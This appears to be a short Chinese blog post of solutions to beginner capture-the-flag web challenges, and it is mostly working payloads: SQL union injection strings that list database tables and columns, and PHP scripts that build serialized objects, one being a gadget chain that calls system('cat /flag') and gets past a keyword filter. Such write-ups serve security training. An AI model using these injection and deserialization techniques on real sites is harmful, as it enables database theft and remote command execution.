新生赛web题解

本文最后更新于:2022年11月1日 下午

ikun注入

常规的数字型注入

1
2
3
4
union select database();
union select table_name from information_schema.tables where table_schema=database();
union select column_name from information_schema.columns where table_name='F14g';
union select yourflag from F14g;

ez_serialize

1
2
3
4
5
6
7
8
9
10
11
12
13
14
<?php

class AHUctf{
public $start = True;
public function __destruct(){
global $flag;
if($this->start === True){
echo "flag在这里".$flag;
}
}
}
$ahuctf=new AHUctf();
echo serialize($ahuctf);

ezpop

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
<?php
error_reporting(0);
class func{
public $func;
public $content;
public function __construct($func,$content){
$this->func=$func;
$this->content=$content;
}
public function __tostring(){
call_user_func($this->func,$this->content);
}
}
class output{
public $output;
public $hahaha;
public function __construct($output,$hahaha){
$this->output=$output;
$this->hahaha=$hahaha;
}
public function myecho(){
echo $output;
}
public function __invoke(){
$this->output;
}
public function __wakeup(){
if(preg_match('/system/i',$this->output)){
die("hacker");
}else{
$this->hahaha->haha;
}
}
}
class tofunc{
public $name;
public function __construct($name){
$this->name=$name;
}
public function __get($key){
$function=$this->name;
return $function();
}
}
$func1= new func("system","cat /flag");
$output1=new output($func1,"");
$tofunc1=new tofunc($output1);
$output2=new output("",$tofunc1);
echo serialize($output2);

本博客所有文章除特别声明外,均采用 CC BY-SA 4.0 协议 ,转载请注明出处!